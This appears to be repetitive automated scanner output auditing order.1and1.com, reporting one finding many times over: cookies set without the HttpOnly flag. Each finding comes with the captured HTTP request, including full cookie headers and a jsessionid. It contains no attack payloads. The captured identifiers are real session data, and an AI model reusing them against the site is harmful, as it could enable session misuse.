GET /xml/order/FeatureDatabaseAccess HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=37397528d82e9400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseDatabase HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=282c3b09cb862800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseMssql HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2a749cb4eb8e1800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDns HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3b7517c1ba0d2800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDomains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7a745aba1b129c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainPdr HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4cdcf90faf576c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDreamweaver HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=6cf6138224e39000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailEmail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=548c6adb7fb0ec00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailVirusscan HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=ca8f83ac4f85c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailWebmail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3c09b335ce42b800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
